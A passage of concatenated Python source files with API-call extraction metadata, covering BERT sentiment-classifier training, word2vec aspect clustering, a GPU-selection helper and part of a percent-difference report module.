6249), False, 'import os\n'), ((6983, 7007), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': 'redu_i'}), '(n_components=redu_i)\n', (6986, 7007), False, 'from sklearn.decomposition import PCA\n'), ((1389, 1439), 'numpy.array', 'np.array', (['[distr_dict_0[k] for k in sorted_keys_0]'], {}), '([distr_dict_0[k] for k in sorted_keys_0])\n', (1397, 1439), True, 'import numpy as np\n'), ((1576, 1626), 'numpy.array', 'np.array', (['[distr_dict_1[k] for k in sorted_keys_1]'], {}), '([distr_dict_1[k] for k in sorted_keys_1])\n', (1584, 1626), True, 'import numpy as np\n'), ((2298, 2357), 'numpy.load', 'np.load', (['pretrain_sets_distribution_path'], {'allow_pickle': '(True)'}), '(pretrain_sets_distribution_path, allow_pickle=True)\n', (2305, 2357), True, 'import numpy as np\n'), ((1782, 1822), 'scipy.special.kl_div', 'scipy.special.kl_div', (['values_0', 'values_1'], {}), '(values_0, values_1)\n', (1802, 1822), False, 'import scipy\n'), ((6939, 6957), 'numpy.shape', 'np.shape', (['features'], {}), '(features)\n', (6947, 6957), True, 'import numpy as np\n'), ((7769, 7787), 'numpy.max', 'np.max', (['get_scores'], {}), '(get_scores)\n', (7775, 7787), True, 'import numpy as np\n'), ((1865, 1883), 'numpy.array', 'np.array', (['values_0'], {}), '(values_0)\n', (1873, 1883), True, 'import numpy as np\n'), ((1886, 1904), 'numpy.array', 
'np.array', (['values_1'], {}), '(values_1)\n', (1894, 1904), True, 'import numpy as np\n'), ((4939, 4958), 'os.path.split', 'os.path.split', (['file'], {}), '(file)\n', (4952, 4958), False, 'import os\n'), ((7726, 7747), 'numpy.argmax', 'np.argmax', (['get_scores'], {}), '(get_scores)\n', (7735, 7747), True, 'import numpy as np\n'), ((3942, 3956), 'numpy.round', 'np.round', (['w', '(2)'], {}), '(w, 2)\n', (3950, 3956), True, 'import numpy as np\n'), ((3966, 3993), 'numpy.arange', 'np.arange', (['(0.0)', '(1.001)', '(0.01)'], {}), '(0.0, 1.001, 0.01)\n', (3975, 3993), True, 'import numpy as np\n'), ((6436, 6460), 'numpy.shape', 'np.shape', (['data_df.values'], {}), '(data_df.values)\n', (6444, 6460), True, 'import numpy as np\n')]
|
import os
import argparse
import json
from datetime import datetime
import numpy as np
from sklearn.utils.class_weight import compute_class_weight
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import confusion_matrix
from tensorflow import keras
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
import bert # https://github.com/kpe/bert-for-tf2/
from onecycle import OneCycleScheduler # https://www.avanwyk.com/tensorflow-2-super-convergence-with-the-1cycle-policy/
from imdb import get_imdb_data
from tweets import get_tweets_data
from amazon import get_reviews_data
parser = argparse.ArgumentParser()
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
parser.add_argument("--experiment_name", type=str, default=current_time, help="Insert string defining your experiment. Defaults to datetime.now()")
parser.add_argument("--task", type=str, required=True, help="One of imdb, reviews, or tweets.")
parser.add_argument("--subtask", type=str, default="german", help="One of german or multi. Ignored for imdb task.")
parser.add_argument("--ckpt_name", type=str, default="bert_model.ckpt", help="Name of BERT checkpoint to load.")
parser.add_argument("--bert_base_path", type=str, default="D:/bert_models/", help="Where to find BERT models.")
parser.add_argument("--model_name", type=str, default=None, help="Name of BERT model. Default depends on task.")
parser.add_argument("--data_dir", type=str, default="data", help="Data directory.")
parser.add_argument("--log_dir", type=str, default="D:\\logs", help="Log directory.")
# training parameters
parser.add_argument("--batch_size", type=int, default=2, help="Batch size.")
parser.add_argument("--patience", type=int, default=3, help="Patience for early stopping.")
parser.add_argument("--learning_rate", type=float, default=2e-5, help="Learning rate.")
parser.add_argument("--max_seq_length", type=int, default=512, help="Maximum frequence length.")
parser.add_argument("--no_class_weights", action='store_true', help="Don't use class weights.")
parser.add_argument("--num_epochs", type=int, default=3, help="Maximum number of epochs.")
parser.add_argument("--test_size", type=float, default=None, help="Test size. Default depends on task.")
parser.add_argument("--num_categories", type=int, default=None, help="Number of categoroies. Defaults to 2 for imdb, 3 otherwise.")
parser.add_argument("--polarized", action='store_true', help="For reviews data: if true and num_categories=3, count only 1 and 5 as pos/neg")
# read variables
ARGS = parser.parse_args()
experiment_name = ARGS.experiment_name
batch_size = ARGS.batch_size
learning_rate = ARGS.learning_rate
max_seq_length = ARGS.max_seq_length
ckpt_name = ARGS.ckpt_name
use_class_weights = not ARGS.no_class_weights
num_epochs = ARGS.num_epochs
task = ARGS.task
bert_base_path = ARGS.bert_base_path
num_categories = ARGS.num_categories
model_name = ARGS.model_name
test_size = ARGS.test_size
subtask = ARGS.subtask
data_dir = ARGS.data_dir
log_dir = ARGS.log_dir
patience = ARGS.patience
polarized = ARGS.polarized
print('Experiment name is ' + experiment_name + '.')
if task == "imdb":
if model_name == None:
model_name = "uncased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 2
elif task == "tweets":
if model_name == None:
model_name = "bert_base_german_cased" if subtask == "german" else "multi_cased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 3
if test_size == None:
test_size = 0.2
elif task == "reviews":
if model_name == None:
model_name = "bert_base_german_cased" if subtask == "german" else "multi_cased_L-12_H-768_A-12"
if num_categories == None:
num_categories = 3
if test_size == None:
test_size = 0.5
else:
raise Exception('No such task.')
ARGS.model_name = model_name
ARGS.num_categories = num_categories
ARGS.test_size = test_size
log_dir = os.path.join(log_dir, experiment_name)
data_dir = os.path.join(data_dir, task)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
config = vars(ARGS)
json.dump(config, open(os.path.join(log_dir, 'config.json'), 'w'), indent=4, sort_keys=True)
if subtask != 'german' and subtask != 'multi':
raise Exception("No such subtask.")
def get_data(task, subtask, num_categories, data_dir, tokenizer, max_seq_length, test_size):
if task == "imdb":
print("Ignoging test_size for imdb data.")
return get_imdb_data(data_dir, tokenizer, max_seq_length)
elif task == "tweets":
return get_tweets_data(data_dir, subtask, num_categories, tokenizer, max_seq_length, test_size)
elif task == "reviews":
return get_reviews_data(data_dir, subtask, num_categories, tokenizer, max_seq_length, test_size, polarized)
else:
raise Exception('No such task.')
if __name__ == "__main__":
bert_path = os.path.join(bert_base_path, model_name)
model_ckpt = os.path.join(bert_path, ckpt_name)
do_lower_case = model_name.find("uncased") != -1
bert.bert_tokenization.validate_case_matches_checkpoint(do_lower_case, model_ckpt)
vocab_file = os.path.join(bert_path, "vocab.txt")
tokenizer = bert.bert_tokenization.FullTokenizer(vocab_file, do_lower_case)
( train_input_ids,
train_input_masks,
train_segment_ids,
train_labels,
test_input_ids,
test_input_masks,
test_segment_ids,
test_labels
) = get_data(task, subtask, num_categories, data_dir, tokenizer, max_seq_length, test_size)
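    # Total number of optimizer steps over all epochs (batches per epoch times epochs); used to shape the 1cycle learning-rate schedule.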
steps = np.ceil(train_input_ids.shape[0] / batch_size) * num_epochs
lr_schedule = OneCycleScheduler(learning_rate, steps)
es = EarlyStopping(monitor='val_SparseCategoricalAccuracy', mode='max', verbose=1, patience=patience)
mc = ModelCheckpoint(os.path.join(log_dir, 'best_model.h5'), monitor='val_SparseCategoricalAccuracy', mode='max', save_best_only=True, save_weights_only=True)
bert_params = bert.params_from_pretrained_ckpt(bert_path)
l_bert = bert.BertModelLayer.from_params(bert_params, name="bert")
in_id = keras.layers.Input(shape=(max_seq_length,), name="input_ids")
bert_output = l_bert(in_id)[:, 0, :]
dropout = keras.layers.Dropout(0.5)(bert_output)
dense = keras.layers.Dense(768, activation="relu")(dropout)
dropout = keras.layers.Dropout(0.5)(dense)
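    # Logits output (no softmax activation); paired with SparseCategoricalCrossentropy(from_logits=True) below.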
pred = keras.layers.Dense(num_categories, activation=None)(dropout)
model = keras.models.Model(inputs=in_id, outputs=pred)
opt = keras.optimizers.Nadam()
model.compile(loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), optimizer=opt, metrics=['SparseCategoricalAccuracy'])
bert.load_bert_weights(l_bert, model_ckpt)
model.summary()
tensorboard_callback = keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0,
write_graph=False, write_images=False, update_freq=1000)
y = np.concatenate([train_labels, test_labels]).flatten()
wgt = compute_class_weight('balanced', np.unique(y), y)
if not use_class_weights:
wgt = (wgt * 0 + 1) / num_categories
print('Class weights:', wgt)
model.fit(
train_input_ids,
train_labels,
class_weight=wgt,
validation_data=(test_input_ids, test_labels),
shuffle=True,
epochs=num_epochs,
batch_size=batch_size,
callbacks=[tensorboard_callback, es, mc, lr_schedule]
)
model.load_weights(os.path.join(log_dir, 'best_model.h5'))
print("Reloaded best parameters.")
y_pred = model.predict(test_input_ids)
y_pred = np.argmax(y_pred, axis=1)
matrix = confusion_matrix(test_labels, y_pred)
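    # Per-class recall: diagonal of the confusion matrix divided by each row's total count.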
print(matrix.diagonal()/matrix.sum(axis=1))
BMAC = balanced_accuracy_score(test_labels, y_pred)
print(BMAC)
|
[
"sklearn.metrics.balanced_accuracy_score",
"bert.load_bert_weights",
"tensorflow.keras.callbacks.EarlyStopping",
"onecycle.OneCycleScheduler",
"tensorflow.keras.layers.Dense",
"amazon.get_reviews_data",
"os.path.exists",
"tensorflow.keras.layers.Input",
"bert.BertModelLayer.from_params",
"tensorflow.keras.optimizers.Nadam",
"argparse.ArgumentParser",
"bert.params_from_pretrained_ckpt",
"numpy.concatenate",
"tensorflow.keras.models.Model",
"sklearn.metrics.confusion_matrix",
"numpy.ceil",
"tensorflow.keras.callbacks.TensorBoard",
"tensorflow.keras.losses.SparseCategoricalCrossentropy",
"bert.bert_tokenization.FullTokenizer",
"tensorflow.keras.layers.Dropout",
"numpy.argmax",
"tweets.get_tweets_data",
"numpy.unique",
"os.makedirs",
"os.path.join",
"datetime.datetime.now",
"imdb.get_imdb_data",
"bert.bert_tokenization.validate_case_matches_checkpoint"
] |
[((627, 652), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (650, 652), False, 'import argparse\n'), ((3962, 4000), 'os.path.join', 'os.path.join', (['log_dir', 'experiment_name'], {}), '(log_dir, experiment_name)\n', (3974, 4000), False, 'import os\n'), ((4012, 4040), 'os.path.join', 'os.path.join', (['data_dir', 'task'], {}), '(data_dir, task)\n', (4024, 4040), False, 'import os\n'), ((4057, 4080), 'os.path.exists', 'os.path.exists', (['log_dir'], {}), '(log_dir)\n', (4071, 4080), False, 'import os\n'), ((4086, 4106), 'os.makedirs', 'os.makedirs', (['log_dir'], {}), '(log_dir)\n', (4097, 4106), False, 'import os\n'), ((4914, 4954), 'os.path.join', 'os.path.join', (['bert_base_path', 'model_name'], {}), '(bert_base_path, model_name)\n', (4926, 4954), False, 'import os\n'), ((4972, 5006), 'os.path.join', 'os.path.join', (['bert_path', 'ckpt_name'], {}), '(bert_path, ckpt_name)\n', (4984, 5006), False, 'import os\n'), ((5064, 5150), 'bert.bert_tokenization.validate_case_matches_checkpoint', 'bert.bert_tokenization.validate_case_matches_checkpoint', (['do_lower_case', 'model_ckpt'], {}), '(do_lower_case,\n model_ckpt)\n', (5119, 5150), False, 'import bert\n'), ((5164, 5200), 'os.path.join', 'os.path.join', (['bert_path', '"""vocab.txt"""'], {}), "(bert_path, 'vocab.txt')\n", (5176, 5200), False, 'import os\n'), ((5217, 5280), 'bert.bert_tokenization.FullTokenizer', 'bert.bert_tokenization.FullTokenizer', (['vocab_file', 'do_lower_case'], {}), '(vocab_file, do_lower_case)\n', (5253, 5280), False, 'import bert\n'), ((5682, 5721), 'onecycle.OneCycleScheduler', 'OneCycleScheduler', (['learning_rate', 'steps'], {}), '(learning_rate, steps)\n', (5699, 5721), False, 'from onecycle import OneCycleScheduler\n'), ((5731, 5832), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_SparseCategoricalAccuracy"""', 'mode': '"""max"""', 'verbose': '(1)', 'patience': 'patience'}), "(monitor='val_SparseCategoricalAccuracy', mode='max', verbose=\n 1, patience=patience)\n", (5744, 5832), False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((6009, 6052), 'bert.params_from_pretrained_ckpt', 'bert.params_from_pretrained_ckpt', (['bert_path'], {}), '(bert_path)\n', (6041, 6052), False, 'import bert\n'), ((6066, 6123), 'bert.BertModelLayer.from_params', 'bert.BertModelLayer.from_params', (['bert_params'], {'name': '"""bert"""'}), "(bert_params, name='bert')\n", (6097, 6123), False, 'import bert\n'), ((6136, 6197), 'tensorflow.keras.layers.Input', 'keras.layers.Input', ([], {'shape': '(max_seq_length,)', 'name': '"""input_ids"""'}), "(shape=(max_seq_length,), name='input_ids')\n", (6154, 6197), False, 'from tensorflow import keras\n'), ((6487, 6533), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': 'in_id', 'outputs': 'pred'}), '(inputs=in_id, outputs=pred)\n', (6505, 6533), False, 'from tensorflow import keras\n'), ((6549, 6573), 'tensorflow.keras.optimizers.Nadam', 'keras.optimizers.Nadam', ([], {}), '()\n', (6571, 6573), False, 'from tensorflow import keras\n'), ((6717, 6759), 'bert.load_bert_weights', 'bert.load_bert_weights', (['l_bert', 'model_ckpt'], {}), '(l_bert, model_ckpt)\n', (6739, 6759), False, 'import bert\n'), ((6814, 6938), 'tensorflow.keras.callbacks.TensorBoard', 'keras.callbacks.TensorBoard', ([], {'log_dir': 'log_dir', 'histogram_freq': '(0)', 'write_graph': '(False)', 'write_images': '(False)', 'update_freq': '(1000)'}), '(log_dir=log_dir, histogram_freq=0, write_graph=\n False, 
write_images=False, update_freq=1000)\n', (6841, 6938), False, 'from tensorflow import keras\n'), ((7648, 7673), 'numpy.argmax', 'np.argmax', (['y_pred'], {'axis': '(1)'}), '(y_pred, axis=1)\n', (7657, 7673), True, 'import numpy as np\n'), ((7687, 7724), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['test_labels', 'y_pred'], {}), '(test_labels, y_pred)\n', (7703, 7724), False, 'from sklearn.metrics import confusion_matrix\n'), ((7784, 7828), 'sklearn.metrics.balanced_accuracy_score', 'balanced_accuracy_score', (['test_labels', 'y_pred'], {}), '(test_labels, y_pred)\n', (7807, 7828), False, 'from sklearn.metrics import balanced_accuracy_score\n'), ((669, 683), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (681, 683), False, 'from datetime import datetime\n'), ((4150, 4186), 'os.path.join', 'os.path.join', (['log_dir', '"""config.json"""'], {}), "(log_dir, 'config.json')\n", (4162, 4186), False, 'import os\n'), ((4492, 4542), 'imdb.get_imdb_data', 'get_imdb_data', (['data_dir', 'tokenizer', 'max_seq_length'], {}), '(data_dir, tokenizer, max_seq_length)\n', (4505, 4542), False, 'from imdb import get_imdb_data\n'), ((5604, 5650), 'numpy.ceil', 'np.ceil', (['(train_input_ids.shape[0] / batch_size)'], {}), '(train_input_ids.shape[0] / batch_size)\n', (5611, 5650), True, 'import numpy as np\n'), ((5853, 5891), 'os.path.join', 'os.path.join', (['log_dir', '"""best_model.h5"""'], {}), "(log_dir, 'best_model.h5')\n", (5865, 5891), False, 'import os\n'), ((6253, 6278), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.5)'], {}), '(0.5)\n', (6273, 6278), False, 'from tensorflow import keras\n'), ((6304, 6346), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(768)'], {'activation': '"""relu"""'}), "(768, activation='relu')\n", (6322, 6346), False, 'from tensorflow import keras\n'), ((6370, 6395), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.5)'], {}), '(0.5)\n', (6390, 6395), False, 'from tensorflow import keras\n'), ((6414, 6465), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['num_categories'], {'activation': 'None'}), '(num_categories, activation=None)\n', (6432, 6465), False, 'from tensorflow import keras\n'), ((7065, 7077), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (7074, 7077), True, 'import numpy as np\n'), ((7513, 7551), 'os.path.join', 'os.path.join', (['log_dir', '"""best_model.h5"""'], {}), "(log_dir, 'best_model.h5')\n", (7525, 7551), False, 'import os\n'), ((4585, 4677), 'tweets.get_tweets_data', 'get_tweets_data', (['data_dir', 'subtask', 'num_categories', 'tokenizer', 'max_seq_length', 'test_size'], {}), '(data_dir, subtask, num_categories, tokenizer,\n max_seq_length, test_size)\n', (4600, 4677), False, 'from tweets import get_tweets_data\n'), ((6597, 6657), 'tensorflow.keras.losses.SparseCategoricalCrossentropy', 'keras.losses.SparseCategoricalCrossentropy', ([], {'from_logits': '(True)'}), '(from_logits=True)\n', (6639, 6657), False, 'from tensorflow import keras\n'), ((6968, 7011), 'numpy.concatenate', 'np.concatenate', (['[train_labels, test_labels]'], {}), '([train_labels, test_labels])\n', (6982, 7011), True, 'import numpy as np\n'), ((4717, 4821), 'amazon.get_reviews_data', 'get_reviews_data', (['data_dir', 'subtask', 'num_categories', 'tokenizer', 'max_seq_length', 'test_size', 'polarized'], {}), '(data_dir, subtask, num_categories, tokenizer,\n max_seq_length, test_size, polarized)\n', (4733, 4821), False, 'from amazon import get_reviews_data\n')]
|
# -*- coding: utf-8 -*-
import gensim
import numpy as np
from sklearn.cluster import MiniBatchKMeans
def read_data_batches(path, batch_size=50, minlength=5):
"""
Reading batched texts of given min. length
:param path: path to the text file ``one line -- one normalized sentence''
:return: batches iterator
"""
batch = []
for line in open(path, encoding="utf-8"):
line = line.strip().split()
# lines with less than `minlength` words are omitted
if len(line) >= minlength:
batch.append(line)
if len(batch) >= batch_size:
yield batch
batch = []
if len(batch) > 0:
yield batch
def text2vectors(text, w2v_model, maxlen, vocabulary):
"""
    Convert a token sequence to a list of word vectors;
    tokens missing from the vocabulary are skipped; the remaining
    slots up to `maxlen` are filled with zero vectors
:param text: list of tokens
:param w2v_model: gensim w2v model
:param maxlen: max. length of the sentence; the rest is just cut away
    :return: list of word vectors, padded with zero vectors up to `maxlen`
"""
acc_vecs = []
for word in text:
if word in w2v_model.wv.index_to_key and (vocabulary is None or word in vocabulary):
acc_vecs.append(w2v_model.wv[word])
# padding for consistent length with ZERO vectors
if len(acc_vecs) < maxlen:
acc_vecs.extend([np.zeros(w2v_model.vector_size)] * (maxlen - len(acc_vecs)))
return acc_vecs
def get_w2v(path):
"""
Reading word2vec model given the path
"""
return gensim.models.Word2Vec.load(path)
def read_data_tensors(path, word_vectors_path=None,
batch_size=50, vocabulary=None,
maxlen=100, pad_value=0, minsentlength=5):
"""
Data for training the NN -- from text file to word vectors sequences batches
:param path:
:param word_vectors_path:
:param batch_size:
:param vocabulary:
:param maxlen:
:param pad_value:
:param minsentlength:
:return:
"""
w2v_model = get_w2v(word_vectors_path)
for batch in read_data_batches(path, batch_size, minsentlength):
batch_vecs = []
batch_texts = []
for text in batch:
vectors_as_list = text2vectors(text, w2v_model, maxlen, vocabulary)
batch_vecs.append(np.asarray(vectors_as_list[:maxlen], dtype=np.float32))
batch_texts.append(text)
yield np.stack(batch_vecs, axis=0), batch_texts
def get_centroids(w2v_model, aspects_count):
"""
    Clustering all word vectors with K-means and returning L2-normalized
cluster centroids; used for ABAE aspects matrix initialization
"""
km = MiniBatchKMeans(n_clusters=aspects_count, verbose=0, n_init=100)
m = []
for k in w2v_model.wv.key_to_index:
m.append(w2v_model.wv[k])
m = np.matrix(m)
km.fit(m)
clusters = km.cluster_centers_
# L2 normalization
norm_aspect_matrix = clusters / np.linalg.norm(clusters, axis=-1, keepdims=True)
return norm_aspect_matrix
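# Illustrative sketch (not part of the original module, never called): the row-wise
# L2 normalization applied to the K-means centroids above, shown on a tiny
# hypothetical matrix.
def _l2_normalize_rows_example():
    import numpy as np
    m = np.array([[3.0, 4.0], [0.0, 2.0]])
    # Each row is divided by its Euclidean norm, as for norm_aspect_matrix above.
    return m / np.linalg.norm(m, axis=-1, keepdims=True)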
if __name__ == "__main__":
for b in read_data_tensors("preprocessed_data/listings.txt", "word_vectors/listings.w2v", batch_size=3):
print(b[0].shape, b[1][:2])
|
[
"gensim.models.Word2Vec.load",
"sklearn.cluster.MiniBatchKMeans",
"numpy.asarray",
"numpy.stack",
"numpy.zeros",
"numpy.linalg.norm",
"numpy.matrix"
] |
[((1577, 1610), 'gensim.models.Word2Vec.load', 'gensim.models.Word2Vec.load', (['path'], {}), '(path)\n', (1604, 1610), False, 'import gensim\n'), ((2729, 2793), 'sklearn.cluster.MiniBatchKMeans', 'MiniBatchKMeans', ([], {'n_clusters': 'aspects_count', 'verbose': '(0)', 'n_init': '(100)'}), '(n_clusters=aspects_count, verbose=0, n_init=100)\n', (2744, 2793), False, 'from sklearn.cluster import MiniBatchKMeans\n'), ((2889, 2901), 'numpy.matrix', 'np.matrix', (['m'], {}), '(m)\n', (2898, 2901), True, 'import numpy as np\n'), ((3012, 3060), 'numpy.linalg.norm', 'np.linalg.norm', (['clusters'], {'axis': '(-1)', 'keepdims': '(True)'}), '(clusters, axis=-1, keepdims=True)\n', (3026, 3060), True, 'import numpy as np\n'), ((2358, 2412), 'numpy.asarray', 'np.asarray', (['vectors_as_list[:maxlen]'], {'dtype': 'np.float32'}), '(vectors_as_list[:maxlen], dtype=np.float32)\n', (2368, 2412), True, 'import numpy as np\n'), ((2466, 2494), 'numpy.stack', 'np.stack', (['batch_vecs'], {'axis': '(0)'}), '(batch_vecs, axis=0)\n', (2474, 2494), True, 'import numpy as np\n'), ((1401, 1432), 'numpy.zeros', 'np.zeros', (['w2v_model.vector_size'], {}), '(w2v_model.vector_size)\n', (1409, 1432), True, 'import numpy as np\n')]
|
from __future__ import absolute_import
import os
import errno
import numpy as np
def mkdir_if_missing(dir_path):
try:
os.makedirs(dir_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def get_free_gpu():
os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')
memory_available = [int(x.split()[2]) for x in open('tmp', 'r').readlines()]
print('Assigning workflow to GPU: ' + str(np.argmax(memory_available)))
return np.argmax(memory_available)
|
[
"os.system",
"numpy.argmax",
"os.makedirs"
] |
[((260, 325), 'os.system', 'os.system', (['"""nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp"""'], {}), "('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')\n", (269, 325), False, 'import os\n'), ((494, 521), 'numpy.argmax', 'np.argmax', (['memory_available'], {}), '(memory_available)\n', (503, 521), True, 'import numpy as np\n'), ((133, 154), 'os.makedirs', 'os.makedirs', (['dir_path'], {}), '(dir_path)\n', (144, 154), False, 'import os\n'), ((453, 480), 'numpy.argmax', 'np.argmax', (['memory_available'], {}), '(memory_available)\n', (462, 480), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Low level tool for writing percent difference reports. Typically, this
is called via: :func:`cla.DR_Results.rptpct`.
"""
from io import StringIO
from types import SimpleNamespace
import warnings
import numpy as np
import matplotlib.pyplot as plt
from pyyeti import ytools, locate, writer
from ._utilities import _get_rpt_headers, _get_numform, _proc_filterval
from ._magpct import magpct
__all__ = ["rptpct1"]
# FIXME: We need the str/repr formatting used in Numpy < 1.14.
try:
np.set_printoptions(legacy="1.13")
except TypeError:
pass
def _apply_pv(value, pv, oldlen):
# if value has a len that's > 1, try to partition it down;
# otherwise, return it as is:
try:
n = len(value)
except TypeError:
return value
else:
if n == 1:
return value
# `value` is a vector with len > 1 ... ensure it is a true numpy
# array:
value = np.atleast_1d(value)
# oldlen is either 0 (for `value` vectors that are expected to be
# full size ... currently, only the `filterval` and
# `magpct_filterval` vectors), or it is the length of the
# dimension that the `value` index type of partition vector
# (currently, only the `ignorepv` vector) was originally defined
# to partition.
if oldlen == 0:
# `value` is `filterval` or `magpct_filterval` ... these just
# need to be partitioned down:
newvalue = value[pv]
else:
# `value` is `ignorepv` ... it needs to be redefined to
# correspond to reduced size:
truefalse = locate.index2bool(value, oldlen)
newvalue = truefalse[pv].nonzero()[0]
return newvalue
def _align_mxmn(mxmn1, mxmn2, labels2, row_number, infodct):
if infodct["labels"] and infodct["labels"] != labels2:
n = len(infodct["labels"])
pv1, pv2 = locate.list_intersect(infodct["labels"], labels2)
mxmn1 = mxmn1[pv1]
mxmn2 = mxmn2[pv2]
infodct["labels"] = [infodct["labels"][i] for i in pv1]
row_number = row_number[pv1]
infodct["filterval"] = _apply_pv(infodct["filterval"], pv1, 0)
infodct["magpct_filterval"] = _apply_pv(infodct["magpct_filterval"], pv1, 0)
infodct["ignorepv"] = _apply_pv(infodct["ignorepv"], pv1, n)
return mxmn1, mxmn2, row_number
def _get_filtline(filterval):
if len(filterval) > 1:
filtline = "Filter: <defined row-by-row>\n"
else:
filtline = f"Filter: {filterval[0]}\n"
return filtline
def _get_noteline(use_range, names, prtbads, flagbads):
noteline = "Notes: "
tab = " "
if not use_range:
noteline += "% Diff = +/- abs(({0}-{1})/{1})*100\n".format(*names)
else:
noteline += "% Diff = +/- abs({0}-{1})/max(abs({1}(max,min)))*100\n".format(
*names
)
noteline += tab + "Sign set such that positive % differences indicate exceedances\n"
prtbad, prtbadh, prtbadl = prtbads
flagbad, flagbadh, flagbadl = flagbads
if prtbad is not None or prtbadh is not None or prtbadl is not None:
if prtbad is not None:
prtbad = abs(prtbad)
noteline += tab + f"Printing rows where abs(% Diff) > {prtbad}%\n"
elif prtbadh is not None:
noteline += tab + f"Printing rows where % Diff > {prtbadh}%\n"
else:
noteline += tab + f"Printing rows where % Diff < {prtbadl}%\n"
if flagbad is not None or flagbadh is not None or flagbadl is not None:
if flagbad is not None:
flagbad = abs(flagbad)
noteline += tab + f"Flagging (*) rows where abs(% Diff) > {flagbad}%\n"
elif flagbadh is not None:
noteline += tab + f"Flagging (*) rows where % Diff > {flagbadh}%\n"
else:
noteline += tab + f"Flagging (*) rows where % Diff < {flagbadl}%\n"
return noteline
def _get_badpv(pct, pv, bad, badh, badl, defaultpv=False):
if bad is not None or badh is not None or badl is not None:
badpv = pv.copy()
if bad is not None:
badpv &= abs(pct) > bad
elif badh is not None:
badpv &= pct > badh
else:
badpv &= pct < badl
else:
badpv = np.empty(len(pct), bool)
badpv[:] = defaultpv
return badpv
def _get_pct_diff(a, b, filt, pv, nastring, mxmn_b=None, ismax=True, flagbads=None):
# either can pass filter to be kept:
pv &= (abs(a) > filt) | (abs(b) > filt)
if mxmn_b is not None:
denom = np.nanmax(abs(mxmn_b), axis=1)
else:
denom = abs(b)
# put 1's in for filtered values ... this is temporary
a = a.copy()
b = b.copy()
a[~pv] = 1.0
b[~pv] = 1.0
z = denom == 0.0
denom[z] = 1.0
pct = 100 * abs(a - b) / denom
pct[z] = 100.0 # np.inf
# make less extreme values negative
neg = a < b if ismax else a > b
pct[neg] *= -1.0
# put nan's in for the filtered or n/a rows:
pct[~pv] = np.nan
# make 7 char version:
spct = [f"{p:7.2f}" for p in pct]
badpv = _get_badpv(pct, pv, *flagbads, False)
for j in badpv.nonzero()[0]:
spct[j] += "*"
for j in (~pv).nonzero()[0]:
spct[j] = nastring
return pct, spct
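# Illustrative sketch (not part of the original module, never called): the sign
# convention used above on a single pair of maxima -- a positive % diff means the
# new value exceeds the reference.
def _pct_diff_sign_example():
    a, b = 12.0, 10.0  # hypothetical max values: new vs. reference
    pct = 100 * abs(a - b) / abs(b)
    return pct if a > b else -pct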
def _get_histogram_str(desc, hdr, pctinfo):
pctcount = pctinfo["hsto"]
s = [
(f"\n\n {desc} - {hdr} Comparison Histogram\n\n"),
(" % Diff Count Percent\n -------- -------- -------\n"),
]
with StringIO() as f:
writer.vecwrite(f, " {:8.2f} {:8.0f} {:7.2f}\n", pctcount)
s.append(f.getvalue())
s.append("\n")
# total_percent_10 will either be 0 or 1000:
# - 0 if all % diffs are "n/a"
# - 1000 otherwise
total_percent_10 = np.round(pctcount[:, 2].sum() * 10)
last = -1.0
for pdiff in [1, 2, 5, 10, 15, 20, 25, 50, 100, 500]:
pvdiff = abs(pctcount[:, 0]) <= pdiff
num = pctcount[pvdiff, 2].sum()
if num > last:
s.append(f" {num:.1f}% of values are within {pdiff}%\n")
if np.round(num * 10) == total_percent_10:
break
last = num
pct = pctinfo["pct"]
n = len(pct)
if n == 0:
s.append(
"\n % Diff Statistics: [Min, Max, Mean, StdDev]"
" = [n/a, n/a, n/a, n/a]\n"
)
else:
stddev = 0.0 if n <= 1 else pct.std(ddof=1)
s.append(
"\n % Diff Statistics: [Min, Max, Mean, StdDev]"
f" = [{pct.min():.2f}, {pct.max():.2f}, {pct.mean():.4f}, {stddev:.4f}]\n"
)
return "".join(s)
def _proc_pct(
ext1,
ext2,
filterval,
magpct_filterval,
*,
names,
mxmn1,
comppv,
mxmn_b,
ismax,
histogram_inc,
prtbads,
flagbads,
numform,
valhdr,
maxhdr,
minhdr,
absmhdr,
pdhdr,
nastring,
doabsmax,
shortabsmax,
print_info,
):
# handle magpct stuff here:
mag = ext1[comppv], ext2[comppv]
if magpct_filterval is not None and len(magpct_filterval) > 1:
magfilt = magpct_filterval[comppv]
else:
magfilt = magpct_filterval
pv = comppv.copy()
pct, spct = _get_pct_diff(
ext1,
ext2,
filterval,
pv,
nastring,
mxmn_b=mxmn_b,
ismax=ismax,
flagbads=flagbads,
)
pct_ret = pct[pv]
hsto = ytools.histogram(pct_ret, histogram_inc)
# for trimming down if prtbad set:
prtpv = _get_badpv(pct, pv, *prtbads, True)
pctlen = max(len(pdhdr), len(max(spct, key=len)))
sformatpd = f"{{:{pctlen}}}"
# for writer.formheader:
numlen = max(13, len(max(names, key=len)), len(numform.format(np.pi)))
if not doabsmax:
print_info.headers1.extend([*names, ""])
print_info.headers2.extend([valhdr, valhdr, pdhdr])
print_info.formats.extend([numform, numform, sformatpd])
print_info.printargs.extend([ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2])
print_info.justs.extend(["c", "c", "c"])
